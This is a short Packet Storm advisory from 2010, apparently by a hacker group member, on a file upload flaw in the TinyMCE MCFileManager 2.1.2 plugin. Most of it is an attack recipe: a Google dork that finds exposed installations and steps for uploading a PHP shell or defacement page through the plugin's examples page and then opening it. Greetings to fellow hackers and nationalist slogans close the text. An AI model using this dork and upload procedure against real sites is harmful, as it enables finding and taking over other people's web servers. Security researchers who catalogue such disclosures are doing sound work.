TinyMCE MCFileManager 2.1.2 Shell Upload

2010-10-04T00:00:00
ID PACKETSTORM:94457
Type packetstorm
Reporter Hackeri-AL
Modified 2010-10-04T00:00:00

Description

                                        
                                            `==============================================  
File Upload Vulnerability [ Plugins tiny_mce ]  
==============================================  
  
http://tinymce.moxiecode.com/plugins_filemanager.php  
  
####################################################################  
  
Author : Hackeri-AL   
Contact : h-al [at] hotmail [dot] it   
Greetz : LoocK3D & b4cKd00r ~ & GHoST61 & BaDBoy  
My Group : UAH-Crew = United Albania Hackers  
  
####################################################################  
  
[~] DORK: inurl:/tiny_mce/plugins/filemanager/  
  
--------------------------------------------------------------------  
  
[~] You go to : htpp://web.com/tiny_mce/plugins/filemanager/  
[~] Redirect to : htpp://web.com/tiny_mce/plugins/filemanager/examples.html <[ upload here shell or index.html ]  
[~] Shell or index : htpp://web.com/tiny_mce/plugins/filemanager/files/shell.php or index.html  
  
####################################################################  
  
[~] Proud 2 be Albania  
[~] Proud 2 be Muslim  
[~] United States of Albania  
  
####################################################################   
  
`